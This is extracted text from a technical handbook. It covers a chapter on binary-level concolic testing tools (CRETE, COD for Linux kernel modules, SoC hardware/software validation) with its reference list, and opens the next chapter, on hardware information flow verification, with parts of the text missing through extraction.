References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1385
Abstract
B. Chen ()
Intel Corporation, Hillsboro, OR, USA
e-mail: [email protected]
F. Xie
Department of Computer Science, Portland State University, Portland, OR, USA
e-mail: [email protected]
of unsafe, insecure, and unreliable computing systems. These all point to the
great needs of sophisticated system validation techniques. This chapter presents
versatile binary-level concolic testing, which defines a standard execution-
trace format, and features an open and highly extensible architecture. It allows
easy integration of multiple concrete execution frontends and symbolic exe-
cution backends, which significantly improves the applicability and flexibility
of symbolic execution, especially to modern computing systems with various
components, e.g., operating systems, firmware, and hardware devices. First, this
chapter presents the design and implementation of CRETE, the infrastructure
of versatile binary-level concolic testing. Second, this chapter presents COD, a
framework based on versatile binary-level concolic testing for automated bug
detection and replay of commercial off-the-shelf (COTS) Linux kernel modules
(LKMs). This framework automatically generates compact sets of test cases
for COTS LKMs, proactively checks for common kernel bugs, and allows to
reproduce reported bugs repeatedly with actionable test cases. Last, this chapter
presents how versatile binary-level concolic testing is leveraged for system-level
validation of Systems-on-Chips (SoC). The authors capture runtime traces of
hardware/software (HW/SW) components across the entire SoC stack which are
emulated by multiple virtual platforms. Based on segmented traces captured from
various SoC components, the authors assemble system-level traces and provide
interfaces for users to inject system-level assertions to validate.
Keywords
Introduction
There have been many recent approaches to symbolic execution (Avgerinos et al.
2014a,b; Shoshitaishvili et al. 2016; Stephens et al. 2016; Redini et al. 2017;
Palikareva et al. 2016; Palikareva and Cadar 2013; Bucur et al. 2014; Kasikci et al.
2015; Ramos and Engler 2015; Zheng et al. 2017; Li et al. 2021; Stoenescu et al.
2016). Generally speaking, these approaches can be classified into two categories:
online symbolic execution (e.g., BitBlaze (Song et al. 2008), KLEE (Cadar et al.
2008), and S2 E (Chipounov et al. 2012)) and concolic execution (a.k.a., offline
symbolic execution, e.g., CUTE (Sen et al. 2005), DART (Godefroid et al. 2005),
and SAGE (Godefroid et al. 2012)). Online symbolic execution closely couples
Symbolic Execution Engines (SEE) with the System Under Test (SUT) and explores
all possible execution paths of SUT online at once. On the other hand, concolic
execution decouples SEE from the SUT through traces, which concretely runs a
single execution path of a SUT and then symbolically executes it. Both online
and offline symbolic execution are facing two major challenges for analyzing
modern software systems: (1) the SUT involves many types of software for different
hardware platforms, and (2) the SUT involves many components distributed on
different machines, and as a whole the SUT cannot fit in any SEE.
What’s more, modern computing systems consist of many software components
from various vendors, and access to all corresponding source code is rarely feasible.
Even when source code is available, building the code exactly as in the shipped
software product is difficult (Bessey et al. 2010). Moreover, even if the source
code is available, compilers can optimize it in many unpredictable ways, such as
undefined behaviors in C (Chipounov 2014). Thus, analyses of the software stack of
computing systems ought to be at binary level, in order to be practical and useful.
Analysis at binary level loses high-level semantics information from the source
code that is critical for efficient symbolic analysis. It adds extra complications
on top of the two open questions of symbolic execution, namely, state explosion
and expensive constraint solving. As a result, optimizations are required to deliver
practical techniques that are using symbolic execution.
Background
This section presents the background of classic symbolic execution and concolic
testing.
Symbolic Execution
Symbolic execution (Baldoni et al. 2018) is a program analysis technique that takes
symbolic inputs, maintains different execution states and constraints of each path in
a program, and utilizes scheduling heuristics (Cha et al. 2018) to effectively explore
the execution tree of the target program. An execution state from the symbolic
exertion of a program includes a statement counter, values of variables, and a path
condition. Since the inputs are symbolic, the values of variables are expressions
38 Versatile Binary-Level Concolic Testing 1369
x=α
Fig. 2 A simple function bad_abs in C with its symbolic execution tree: (a) Function bad_abs
in C. (b) Symbolic execution tree of bad_abs with symbolic value α assigned to input variable x
over symbolic inputs, and the path condition is a Boolean expression over symbolic
inputs. Figure 2 illustrates an example of symbolic execution. At the entry of
function bad_abs, input x is assigned with symbolic value α, which allows all
valid values of integer type. For each conditional branch related to symbolic inputs,
if both paths are feasible, a new execution state will be forked from the current
execution state. By updating path condition based on the branch condition, both
paths of the conditional branch can be covered and explored. For this example,
symbolic execution forks states twice for two conditional branches, covering three
paths in the function.
Concolic Testing
Concolic execution (Sen et al. 2005; Kannavara et al. 2015) combines concrete
and symbolic execution. It leverages a concrete execution path to guide symbolic
execution to achieve better scalability (Cadar and Sen 2013). It has advantages over
concrete execution since it only explores each execution path once based on path
constraints, while it is more scalable than symbolic execution because it leverage
information from concrete execution to augment symbolic execution. Figure 3
illustrates the basic workflow of concolic testing.
1370 B. Chen and F. Xie
Given an initial test case, the software program under test is concretely executed.
During the concrete execution, a trace of the concrete execution is captured, which
mainly contains path constraints of the exercised path. By using an offline constraint
solver, each branch condition from the captured trace is negated to generate a new
test case, aiming at covering new paths of the program under test. Newly generated
test cases are fed back into the concrete execution. This process repeats until all
paths of the program have been explored or a user specified condition is satisfied.
Related Works
DART (Godefroid et al. 2005) and CUTE (Sen et al. 2005) are both early
representative work on concolic testing. They operate on the source code level.
CRETE further extends concolic testing and targets close-source binary programs,
while it also modularizes concolic testing by loosely coupling concrete execution
and symbolic execution only by standardized trace files based on the LLVM bitcode
and test cases. SAGE (Godefroid et al. 2012) is a Microsoft internal concolic testing
tool that particularly targets at X86 binaries on Windows.
KLEE (Cadar et al. 2008) is a source-code-level symbolic execution tool that
is built on the LLVM infrastructure (Lattner and Adve 2004) and is capable of
generating high-coverage test cases for C programs. KLEE analyzes the LLVM
bitcode compiled from the C SUT, symbolically explores the execution paths of
the program, and generates a test case for each path explored. S2 E (Chipounov
et al. 2012) provides a framework for developing tools for analyzing close-source
software programs. It augments a virtual machine (VM) with a SEE and path
analyzers. It features a tight coupling of concrete and symbolic execution. The
execution of a SUT can cross back and forth between concrete and symbolic
execution.
BitBlaze (Song et al. 2008) is an early representative work on binary analysis
for computer security. It provides TEMU, a QEMU-based runtime analysis frontend,
and VINE, a symbolic execution backend. TEMU and VINE were closely inte-
grated into Rudder, a tool for symbolic execution of software binaries. BitBlaze,
particularly Rudder, focuses on effective detection of security vulnerabilities by
leveraging the close coupling of TEMU and VINE. Mayhem (Cha et al. 2012) and
MergePoint (Avgerinos et al. 2014a) build on BitBlaze and further optimize the
close coupling of their concrete execution frontend and symbolic analysis backend
to improve their effectiveness in detecting exploitable software bugs.
ANGR is an extensible Python framework for binary analysis using VEX (Nether-
cote and Seward 2007) as an intermediate representation (IR). It implemented a
number of existing analysis techniques and enabled the comparison of different
techniques in a single platform. ANGR provides CLE to load the binary under test in
its own virtual environment and provides lifters to disassemble binary code into
VEX IR, from where it conducts symbolic execution over VEX IRs. As ANGR
performs in vitro binary analysis, it requires to model the real execution environment
for the binary under test, like system calls and common library functions. This is
38 Versatile Binary-Level Concolic Testing 1371
one of the biggest limitations of angr, because the environment model can never be
complete nor accurate.
Much research has been done in the area of HW/SW co-validation which are
close to CRETE. HW/SW co-verification is a common technique which mainly
uses model checking to verify HW/SW interface protocols against the driver and
various device models (Kurshan et al. 2002; Mukherjee et al. 2017; Corteggiani
et al. 2021; Jakobs et al. 2021; Lyu and Mishra 2021). Recently research work
leverages virtual devices for HW/SW co-validation and SoC validation (Gu et al.
2018; Lei et al. 2019). Symbolic execution with VD co-verification is proposed to
verify hardware and firmware interactions (Horn et al. 2013; Alam et al. 2022). This
work either focuses on device/driver interfaces or device/firmware interfaces, which
lacks holistic system-level analysis of the entire SoC stack.
The CRETE framework for binary-level concolic testing features several key design
goals:
• Binary-Level In Vivo Analysis. It requires only the binary of the SUT and
performs analysis in its real execution environment.
• Extensibility. It allows easy integration of concrete execution frontends and SEE
backends.
• High Coverage. It achieves coverage that is not significantly lower than the
coverage attainable by source-level analysis.
• Minimal Changes to Existing Testing Processes. It should simply provide
additional test cases that can be plugged into existing testing processes without
major changes to the testing processes.
This online tracing and offline test generation process is iterative: it repeats until all
generated test cases are issued or time bounds are reached. The CRETE framework
extends this process to satisfy its design goals as follows.
tracing facility, or a dynamic binary instrumentation tool, such as PIN (Luk et al.
2005) and DynamoRIO (Bruening et al. 2012).
• The concrete and symbolic execution environments are decoupled by standard-
ized traces. As long as they can generate and consume standardized traces, they
can work together as a cohesive concolic process.
• Optimization can be explored on both tracing and test case generation, for
example, selective binary-level tracing to improve scalability and concolic
test generation to reduce test case redundancy. This makes high-coverage test
generation on binary level possible.
• The tracing plugin is transparent to existing testing processes, as it only collects
information. Therefore, no change is made to the testing processes.
As shown in Fig. 4, CRETE has four key components: CRETE Runner, a tiny
helper program executing in the guest OS of the VM, which parses the configuration
file and launches the target binary program (TBP) with the configuration and test
cases; CRETE Tracer, a comprehensive tracing plugin in the VM, which captures
binary-level traces from the concrete execution of the TBP in the VM; CRETE
Replayer, an extension of the SEE, which enables the SEE to perform concolic
execution on the captured traces and to generate test cases; CRETE Manager, a
coordinator that integrates the VM and SEE, which manages runtime traces captured
and test cases generated, coordinates the concrete and symbolic execution in the VM
and the SEE, and iteratively explores the TBP.
CRETE takes a TBP and a configuration file as inputs, and outputs generated test
cases along with a report of detected bugs. The manual effort and learning curve to
utilize CRETE are minimal. It makes virtually no difference for users to set up the
testing environment for the TBP in a CRETE-instrumented VM than a vanilla VM.
The configuration file is an interface for users to configure parameters on testing a
TBP , especially specifying the number and size of symbolic command-line inputs
and symbolic files for test case generation.
Trace Pool
test case test cases
trace trace
Guest OS
S
Executable
Symbolic Execution
CRETE Runner CRETE
Engine
Manager
Virtual Machine
The workflow of CRETE is shown in Fig. 5. CRETE works in iterations and each
iteration includes the following phases:
• Binary Execution Phase: CRETE Runner first loads the input binary and a test
case into the guest OS. Then CRETE Runner executes the binary with the data
defined in the test case as inputs. In this way, the binary is executed within VM in
its native, unmodified guest OS environment.
• Trace Capture Phase: Along with the execution of the target program, CRETE
Tracer captures the runtime information needed to constitute a runtime trace for
symbolic analysis.
• Trace Selection Phase: CRETE Manager takes the captured trace as input and
maintains a pool of traces. CRETE Manager then selects a trace from this pool
and passes it to CRETE Replayer.
• Offline Replaying Phase: CRETE Replayer, in turn, invokes the SEE to execute
the selected trace symbolically. The SEE performs concolic test case generation.
• Test Selection Phase: CRETE Manager receives newly generated test cases from
the SEE and maintains a test case pool. CRETE Manager then selects one test
case from the pool and sends it back to CRETE Runner to start the next iteration
of CRETE. This workflow iterates until no more test cases can be generated or
user-specified time bounds are reached.
Real-World Examples
Table 1 Comparison of average and median coverage by KLEE, ANGR, and CRETE on CORE-
UTILS
Table 2 Distribution comparison of coverage achieved by KLEE, ANGR, and CRETE on CORE-
UTILS
Table 3 Classified crashes found by CRETE on TianoCore utilities: 84 unique crashes from eight
programs
Crash type Count severity Crashed programs
Stack corruption 1 High (exploitable) VfrCompile
Heap error 6 High (exploitable GenFw
Write access violation 23 High (exploitable) EfiLdrImage, GenFw,
EfiRom, GenFfs
Abort signal 2 Medium (signs of GenFw
exploitable)
Read access violation 45 Low (may not be GenSec, GenFw, Split,
exploitable) GenCrc32, VfrCompile
Other access violation 7 Mixed GenFw
delivered high code coverage from scratch, above 80% line coverage, on 9 out of
16 programs. What’s more, CRETE found 84 distinct crashes (by stack hash) from
eight TianoCore utility programs. Table 3 shows that CRETE found various kinds
of crashes including many exploitable ones, such as stack corruption, heap error,
and write access violation. Most of the crashes were confirmed as real bugs, and ten
of them were fixed promptly in the upstream.
This section presents COD, a framework for efficient bug detection and replay
of commercial off-the-shelf (COTS) Linux kernel modules based on the versatile
binary-level concolic testing. The framework automatically generates compact sets
of test cases for COTS LKMs, proactively checks for common kernel bugs, and
allows to reproduce reported bugs repeatedly with actionable test cases.
The COD framework features the following design goals for analyzing LKMs:
To achieve the goals above, the versatile binary-level concolic testing approach of
CRETE is adopted and extended in the design of the COD framework as follows.
As shown in Fig. 7, the COD architecture for test case generation is split into
two domains, VM guest OS and host OS. A user-land Agent and two custom ker-
nel modules, kernel shim and kernel hypercall interface, together
with target LKMs and native OS stack are running within VM guest OS. A virtual
38 Versatile Binary-Level Concolic Testing 1377
Hypercall 7 VM
Target LKMs Interface COD Tracer
T
machine augmented with COD Tracer, a symbolic engine augmented with COD
Trace Replayer, and a Manager are running on host machine.
Here is the events and communications that take place during the test case
generation process of the COD framework. When the manager is started, (1) it
sends a message to Agent through sockets and (2) sends an initial test case to the
VM. The message contains a list of target LKMs and a sequence of commands as
test harness. (3) The Agent loads two custom kernel modules, kernel shim
and kernel hypercall interface, and passes them the list of LKMs
as parameters. (4) The Agent then executes the commands of the test harness
sequentially to trigger functionalities of target LKMs through base kernel. (5)
The custom kernel module kernel shim intercepts the interactions between
base kernel and target LKMs. (6) It also communicates with the VM through the
other module kernel hypercall interface, to add new tainted values
to the taint analysis engine in the VM, report kernel panics to the VM, and
retrieve values of test case from VM to modify the interactions between target
LKMs and base kernel if needed. (7) When all commands in the test harness
are finished, the COD Tracer captures the runtime execution trace into a file
and sends it to symbolic engine through the manager over sockets. (8) The COD
Trace Replayer performs symbolic analysis over the captured trace and sends
the generated test cases back to the VM. The iteration of test case generation repeats
from step (4) to step (8) and stops when user-specified conditions are met, e.g., time
limits.
COD allows user to reproduce generated test cases repeatedly on both physical
and virtual machines and generates crash log to assist developers to debug and
fix reported bugs. As shown in Fig. 8, the architecture of test case replay in COD
is composed of a user-mode program TC Replayer with an extensible plugin
kAPI Checker and three custom kernel modules, namely, Kernel Shim,
TC Element Supplier, and kAPI Tracer. The workflow of this design
1378 B. Chen and F. Xie
Real-World Examples
Table 5 New Linux kernel Index LKM Bug description Patch hash
vulnerabilities detected by
1 E1000 Resource leak ee400a3
COD
2 E1000 Null-pointer dereference cf1acec
3 Pcnet32 Resource leak d7db318
4 8139too(cp) Kernel API misuse a456757
5 hda_intel Null-pointer dereference a3aa60d
reported a total of five new distinct vulnerabilities from four different kernel module.
As shown in Table 5, COD detected various kinds of vulnerabilities, including
null-pointer dereference, resource leak, and kernel API misuse. All the bugs were
reported to the Linux kernel community and were patched immediately. The links
of the submitted bugs are omitted for double-blind review purpose.
The authors take Bug 1 as an example to explain why COD is able to generate
test cases from COTS LKMs to trigger and report the new flaws in Table 5. Bug
1 is detected by TC Replayer during the replay of COD generated test cases,
where kAPI checker reported a piece of memory allocated by function __-
kmalloc is not paired with any memory de-allocation function. By examining
test cases triggering this bug, the authors found COD only flipped a single kernel
API return from the initial test case. COD was able to explicitly flip these single
API returns because there are conditional branches in the target LKM depending on
the flipped API returns. By leveraging concolic execution, COD was able to negate
these branch conditions precisely, generate a compact set of test cases to explore
new code in the LKM, and finally catch the bug with TC Replayer and kAPI
checker. For the similar reason, COD flipped more kernel APIs, generated LKM
test cases with the right kernel API combination to reach error paths, and finally
reported these vulnerabilities with TC Replayer.
1380 B. Chen and F. Xie
As shown in Fig. 9, the framework mainly has two phases, online tracing and offline
analysis. At runtime (online), it performs end-to-end tracing over the entire SoC
stack emulated by multiple virtual platforms (VP), from which a sequence of traces
is captured, including host SW traces, virtual device (VD) traces, and firmware
traces. Statically (offline), the framework assembles segmented traces into a holistic
system-level trace, provides instrumentation interfaces for user-defined assertions
and symbolic values over the assembled trace, and utilizes concolic/symbolic
engines to generate test cases that either explore new usages of the SoC or trigger
user-defined assertions.
A set of tracers are provided to each SoC hardware component for runtime
tracing, as shown in Fig. 9. The tracer for host SW is an extension to the SoC host
VP. When a target application is invoked, the tracer captures user inputs as r h and
takes a snapshot of the VP’s CPU and memory as s h . It also monitors the complete
execution of host SW to capture a sequence of machine-level instructions as the
execution path of host SW π h . The VD tracer is a wrapper to the IP VD, which
intercepts all interactions between the IP VD and the SoC host VP. For each host
SW/VD interaction, the tracer captures the VD requests as r v and takes the snapshot
of the VD state as s v . The π v is a concrete execution path of the VD and can be
derived from the VD source code with the captured r v . The tracer for firmware is an
extension to the IP Core VP. For each request from VD, it captures the request input
as r f , takes a snapshot of the VP’s CPU and memory before the execution of the
firmware as s f , and monitors the complete execution of the firmware to capture
a sequence of machine-level instructions as the execution path of firmware π f .
A unified instruction format is needed to make traces captured by different tracers
compatible.
38 Versatile Binary-Level Concolic Testing 1381
Fig. 9 Architecture and workflow of end-to-end concolic testing for hardware/software co-
validation: (1) execute SoC software stack over different VPs with partitioned VDs; (2) capture
segmented traces from UOD, VD, and firmware, respectively; (3) assemble a system-level trace and
inject system- level assertions; and (4) inject symbolic values at HW/SW interfaces and perform
concolic-symbolic hybrid execution, generating test cases to cover new usage of the SoC or trigger
assertions
Algorithm 1: ASSEMBLE-SYS-TRACE τ h , T v , T f
1 r h , s h , π h ← τ h
2 S v ← map (STATE, T v ) , S f ← map STATE, T f
3 π ← [] initialize π to be an empty sequence
4 foreach i h ∈ π h do
5 if i h is normal instruction then APPEND(π, i h )
6 else i h interacts with virtual device
7 APPEND(π, NopEnterVd)
8 r v , s v , π v ← NEXT(T v )
9 foreach i v ∈ π v do
10 if i v is normal instruction then APPEND(π, i v )
11 else i v interacts with firmware
12 APPEND(π, NopEnterFw)
13 r f , s f , π f ← NEXT(T f )
14 foreach i f ∈ π f do
15 APPEND(π, i f )
16 APPEND(π, NopLeaveFw)
17 APPEND(π, NopLeaveVd)
18 return r h , s h , S v , S f , π
Algorithm 2: INTERPRET-SYS-TRACE τ S , callbacks
1 r h , s h , S v , S f , π S ← τ S
2 foreach i ∈ π S do
3 switch i do
4 case NopEnterVd : do s v ← NEXT(S v )
5 case NopEnterFw : do s f ← NEXT(S f )
6 otherwise do EXECUTE(s h , s v , s f , i)
7 if i is Nops then
8 PROCESS-CALLBACKS(r h , s h , s v , s f , callbacks)
analysis of the SoC trace, which is similar to various consistency models described
in S2E (Chipounov et al. 2012).
Real-World Examples
Table 7 Number of generated test cases and triggered assertions from concolic-symbolic hybrid
execution
User-inputs to stimulus Driver/VD interface VD/firmware interface
Generated test cases 20 1001 49
Validated assertions 5 1 4
Fired assertions 1 7 2
Detected bugs 1 3 1
Symbolic values of user inputs to stimulus generated the least number of test
cases and triggered the least number of assertions since they crosscut the entire
SoC stack and accumulate complete constraints of the SoC execution. Following the
strictest constraints also makes all generated test cases valid to the entire SoC and
hence does not introduce false alarms. Behind the only assertion failure triggered by
the test cases of application inputs, a bug in the FW is discovered. Although this bug
is handcrafted, it demonstrates that the framework can precisely explore the impact
of user inputs to the top level of the host SW stack across the entire SoC HW/SW
stack. It generated an exact test case that pinpoints the FW buggy path from the user
inputs to the host SW.
Symbolic values of driver/VD interfaces generated the largest number of test
cases and triggered the largest number of assertions, while it has a much higher false
rate on assertions triggered. By following partial constraints of the SoC stack, it is
38 Versatile Binary-Level Concolic Testing 1385
easier to explore partial stack more thoroughly, but it also produces test cases that
might be invalid to the entire SoC stack. Manual efforts are needed to review all the
triggered assertions. In the experiment, there are seven triggered assertions in total
where three of them are real alarms and report real bugs. Besides the handcrafted
FW bug, two bugs from the E1000 VD in QEMU are detected by the approach. One is
reported by assertion P 3 as shown in Fig. 10, and both of them are the functionalities
that are required according to the Intel E1000 Manual while not being implemented
in QEMU’s E1000 VD. Moreover, as the FW is written by us and has basic logic, the
test cases and triggered assertions from VD/FW interface are much less compared
to those from driver/VD interface.
Conclusions
References
Alam T, Yang Z, Chen B, Armour N, Ray S (2022) Firver: concolic testing for systematic validation
of firmware binaries. In: 27th Asia and South Pacific design automation conference, ASP-DAC
2022, Taipei, 17–20 Jan 2022. IEEE, pp 352–357
Avgerinos T, Rebert A, Cha SK, Brumley D (2014a) Enhancing symbolic execution with
veritesting. In: 36th international conference on software engineering, ICSE’14, Hyderabad,
pp 1083–1094
Avgerinos T, Cha SK, Rebert A, Schwartz EJ, Woo M, Brumley D (2014b) Automatic exploit
generation. Commun ACM 57(2):74–84
Bai JJ, Wang YP, Yin J, Hu SM (2016) Testing error handling code in device drivers using
characteristic fault injection. In: Proceedings of the 2016 USENIX conference on Usenix annual
technical conference, USENIX ATC’16, Berkeley. USENIX Association, pp 635–647
Baldoni R, Coppa E, D’Elia DC, Demetrescu C, Finocchi I (2018) A survey of symbolic execution
techniques. ACM Comput Surv 51(3):50:1–50:39
Bessey A, Block K, Chelf B, Chou A, Fulton B, Hallem S, Henri-Gros C, Kamsky A, McPeak S,
Engler D (2010) A few billion lines of code later: using static analysis to find bugs in the real
world. Commun ACM 53(2):66–75
1386 B. Chen and F. Xie
Kannavara R, Havlicek CJ, Chen B, Tuttle MR, Cong K, Ray S, Xie F (2015) Challenges and
opportunities with concolic testing. In: 2015 national aerospace and electronics conference
(NAECON), pp 374–378
Kasikci B, Zamfir C, Candea G (2015) Automated classification of data races under both strong
and weak memory models. ACM Trans Program Lang Syst 37(3):8:1–8:44
King JC (1976) Symbolic execution and program testing. Commun ACM 19(7):385–394
Kurshan RP, Levin V, Minea M, Peled D, Yenigün H (2002) Combining software and hardware
verification techniques. Formal Methods Syst Des (FMSD) 21(3):251–280
Kuznetsov V, Kinder J, Bucur S, Candea G (2012) Efficient state merging in symbolic execution.
In: Proceedings of the 33rd ACM SIGPLAN conference on programming language design and
implementation, PLDI’12, New York. ACM, pp 193–204
Lattner C, Adve V (2004) LLVM: a compilation framework for lifelong program analysis
& transformation. In: Proceedings of the international symposium on code generation and
optimization: feedback-directed and runtime optimization, CGO’04, Washington, DC. IEEE
Computer Society, p 75
Lei L, Cong K, Yang Z, Chen B, Xie F (2019) Hardware/software co-monitoring. In: CoRR,
arXiv:1905.03915 [cs.SE]
Li Z, Chen B, Feng W, Xie F (2021) Concolic execution of nmap scripts for honeyfarm generation.
In: Jaeger T, Qian Z (eds) MTD@CCS 2021: proceedings of the 8th ACM workshop on moving
target defense, virtual event, Republic of Korea, 15 Nov 2021. ACM, pp 33–42
Stoenescu T, Stefanescu A, Predut S, Ipate F (2016) RIVER: a binary analysis framework using
symbolic execution and reversible x86 instructions. In: Fitzgerald JS, Heitmeyer CL, Gnesi S,
Philippou A (eds) FM 2016: formal methods – 21st international symposium, Limassol, 9–11
Nov 2016, Proceedings. Volume 9995 of Lecture notes in computer science, pp 779–785
Luk CK, Cohn R, Muth R, Patil H, Klauser A, Lowney G, Wallace S, Reddi VJ, Hazelwood K
(2005) Pin: building customized program analysis tools with dynamic instrumentation. In:
Proceedings of the 2005 ACM SIGPLAN conference on programming language design and
implementation, PLDI’05, New York. ACM, pp 190–200
Lyu Y, Mishra P (2021) Scalable concolic testing of RTL models. IEEE Trans Comput 70(7):979–
991
Marinescu PD, Cadar C (2012) Make test-zesti: a symbolic execution solution for improving
regression testing. In: Proceedings of the 34th international conference on software engineering,
ICSE’12, Piscataway. IEEE Press, pp 716–726
Mukherjee R, Purandare M, Polig R, Kroening D (2017) Formal techniques for effective co-
verification of hardware/software co-designs. In: Proceedings of the 54th annual design
automation conference, DAC 2017, Austin
Nethercote N, Seward J (2007) Valgrind: a framework for heavyweight dynamic binary
instrumentation. In: Proceedings of the 28th ACM SIGPLAN conference on programming
language design and implementation, PLDI’07, New York. ACM, pp 89–100
Palikareva H, Cadar C (2013) Multi-solver support in symbolic execution. In: Proceedings of the
25th international conference on computer aided verification, CAV’13. Springer, Berlin/Heidel-
berg, pp 53–68
Palikareva H, Kuchta T, Cadar C (2016) Shadow of a doubt: testing for divergences between
software versions. In: Proceedings of the 38th international conference on software engineering,
ICSE’16, New York. ACM, pp 1181–1192
Ramos DA, Engler D (2015) Under-constrained symbolic execution: correctness checking for
real code. In: Proceedings of the 24th USENIX conference on security symposium, SEC’15,
Berkeley. USENIX Association, pp 49–64
Redini N, Machiry A, Das D, Fratantonio Y, Bianchi A, Gustafson E, Shoshitaishvili Y, Kruegel C,
Vigna G (2017) Bootstomp: on the security of bootloaders in mobile devices. In: 26th USENIX
security symposium (USENIX security 17), Vancouver. USENIX Association, pp 781–798
Renzelmann MJ, Kadav A, Swift MM (2012) Symdrive: testing drivers without devices. In:
Proceedings of the 10th USENIX conference on operating systems design and implementation,
OSDI’12, Berkeley. USENIX Association, pp 279–292
1388 B. Chen and F. Xie
Sen K, Marinov D, Agha G (2005) CUTE: a concolic unit testing engine for C. In: Proceedings
of the 10th European software engineering conference held jointly with 13th ACM SIGSOFT
international symposium on foundations of software engineering, ESEC/FSE-13, New York.
ACM, pp 263–272
Shoshitaishvili Y, Wang R, Salls C, Stephens N, Polino M, Dutcher A, Grosen J, Feng S, Hauser C,
Krügel C, Vigna G (2016) SOK: (state of) the art of war: offensive techniques in binary analysis.
In: IEEE symposium on security and privacy, SP’16. IEEE Computer Society, pp 138–157
Song D, Brumley D, Yin H, Caballero J, Jager I, Kang MG, Liang Z, Newsome J, Poosankam
P, Saxena P (2008) Bitblaze: a new approach to computer security via binary analysis. In:
Proceedings of the 4th international conference on information systems security, ICISS’08.
Springer, Berlin/Heidelberg, pp 1–25
Stephens N, Grosen J, Salls C, Dutcher A, Wang R, Corbetta J, Shoshitaishvili Y, Kruegel C, Vigna
G (2016) Driller: augmenting fuzzing through selective symbolic execution. In: Proceedings of
the network and distributed system security symposium, NDSS’16. The Internet Society
The Guardian (2017) IT meltdown has cost British Airways $80m so far, says Willie
Walsh. https://www.theguardian.com/business/2017/jun/15/it-meltdown-cost-british-airlines-
80m-so-far-willie-walsh-iag
The New York Times (2018) Facebook security breach exposes accounts of 50 million users.
https://www.nytimes.com/2018/09/28/technology/facebook-hack-data-breach.html
Tianocore (2022) http://www.tianocore.org/
Tianocore (2022) EDK II. https://github.com/tianocore/edk2
Torvalds L (2005) Initial commit of linux kernel’s git repository. https://git.io/fjGug
Wong E, Zhang L, Wang S, Liu T, Tan L (2015) Dase: document-assisted symbolic execution for
improving automated software testing. In: Proceedings of the 37th international conference on
software engineering – Volume 1, ICSE’15, Piscataway. IEEE Press, pp 620–631
Zheng H, Li D, Liang B, Zeng X, Zheng W, Deng Y, Lam W, Yang W, Xie T (2017) Automated
test input generation for android: towards getting there in an industrial case. In: Proceedings
of the 39th international conference on software engineering: software engineering in practice
track, ICSE-SEIP’17, Piscataway. IEEE Press, pp 253–262
Information Flow Verification
39
Cynthia Sturton and Ryan Kastner
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1390
Information Flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1391
Information Flow Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1391
Specifying Information Flow Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1395
Information Flow Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1396
Trace Properties and Hyperproperties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1398
Verifying Hyperproperties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1399
Verification Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1403
Simulation-Based Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1403
Formal Verification Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1404
Case Studies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1404
Cache Timing Side Channels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1405
Memory Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1408
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1410
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1410
Abstract
Information flow tracking (IFT) models the movement of data which enables
verification of security properties related to integrity and confidentiality. This
chapter introduces the basics of hardware information flow analysis and illus-
trates its use for hardware security verification. The chapter starts by describing
information flow models and properties. Then it highlights how information flow
C. Sturton ()
University of North Carolina at Chapel Hill, Chapel Hill, NC, USA
e-mail: [email protected]
R. Kastner
University of California San Diego, La Jolla, CA, USA
e-mail: [email protected]
Keywords
Introduction
information should not leak into user memory space. The IFT property may also
involve conditions, e.g., the key cannot flow to the JTAG port except during debug
mode. Properties related to integrity and timing can be crafted in a similar manner
as described later in the chapter.
IFT verification involves understanding when, where, how, and why information
flows occur. IFT verification techniques range from formal methods to simulation,
emulation, and dynamic monitoring. Formal analysis provides guarantees on cor-
rectness and complete coverage but typically fails to scale past the level of IP cores.
Simulation allows for larger analysis across a system on chip. Emulation allows for
the even more complex analysis involving software and OS interactions. Dynamic
monitoring performs real-time flow tracking.
This chapter serves to act as an introduction to the use of information flow
tracking for hardware security verification. The aim is to provide the necessary
background on information flow tracking models, properties, analysis, and verifi-
cation tools and then demonstrate how information flow tracking can be used in two
case studies related to cache timing leakage and on-chip access control.
Information Flow
occurs. The flow relation defines the allowable flows between every pair of security
classes. For example, one might first label registers that hold cryptographic key
material as “secret” and label ports as “public” and then further specify that
information should never flow from “secret” to “public” elements. In this way, one
can specify the flows that should and should not occur.
The security classes SC and their allowable flows → are key to using information
flow tracking to verify security properties. Assume that there are two security
classes: high and low (SC = {H, L}) and a flow relation L → H . The relation
indicates that it is allowable for information labeled as L to flow to storage objects
labeled as H . However, the opposite is not true: H L; high information should
never flow to storage objects with an L label. This simple lattice is shown in Fig. 1a.
While simple, this two-label lattice is quite powerful. Viewing the lattice in light
of integrity (Fig. 1b), the H label would be considered untrusted, and the L label is
trusted. In this case, one wants to ensure that untrusted information can never affect
a trusted storage object, i.e., untrusted trusted, which would violate the integrity
